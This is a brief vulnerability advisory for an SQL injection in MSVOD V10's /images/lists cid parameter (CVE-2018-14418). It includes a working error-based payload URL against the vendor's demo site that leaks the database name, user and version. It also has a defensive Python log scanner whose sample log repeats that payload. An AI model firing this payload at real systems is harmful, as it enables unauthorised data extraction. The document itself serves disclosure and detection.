MSVOD V10 – SQL Injection

MSVOD V10 – SQL Injection via /images/lists

The $cid parameter is user-controllable.

Open the page: /images/lists?cid='

The query then fails with an SQL error:

The error output shows the failing SQL statement:

Final payload:

Official demo:

http://px.msvodx.com/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
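
A detection check for the requests above, as an added example (not part of the original advisory or of MSVOD's code): it scans web access-log lines for /images/lists requests whose cid is not a plain integer and names the markers found. The log lines are constructed, and the 10-digit limit on a legitimate cid is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers taken from the two requests shown in this advisory.
MARKERS = {
    "quote": re.compile("['\"]"),
    "closing-paren": re.compile(r"\)"),
    "order-by": re.compile(r"\border\s+by\b", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "sql-comment": re.compile(r"--"),
}
# Constructed sample log; client addresses are from a documentation range.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [01/Aug/2018:10:00:01 +0000] "GET /images/lists?cid=13 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Aug/2018:10:00:07 +0000] "GET /images/lists?cid=%27 HTTP/1.1" 500 812',
    '192.0.2.44 - - [01/Aug/2018:10:00:09 +0000] "GET /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20 HTTP/1.1" 500 934',
    '192.0.2.10 - - [01/Aug/2018:10:00:12 +0000] "GET /video/lists?cid=abc HTTP/1.1" 200 4096',
])

def check_line(line):
    """Return None for a clean line, else (decoded cid, [marker names])."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rstrip("/") != "/images/lists":
        return None  # only the endpoint named in the advisory is checked
    for value in parse_qs(url.query, keep_blank_values=True).get("cid", []):
        # Assumption: a legitimate cid is a short decimal category id.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            return value, hits or ["non-numeric"]
    return None

def scan(log_text):
    """Return [(line_number, cid_value, markers)] for every flagged request."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = check_line(line)
        if hit:
            findings.append((n, hit[0], hit[1]))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same integer-only rule, enforced server-side before $cid reaches the query, is the corresponding input check.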

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14418

Exploit-DB: https://www.exploit-db.com/exploits/45062/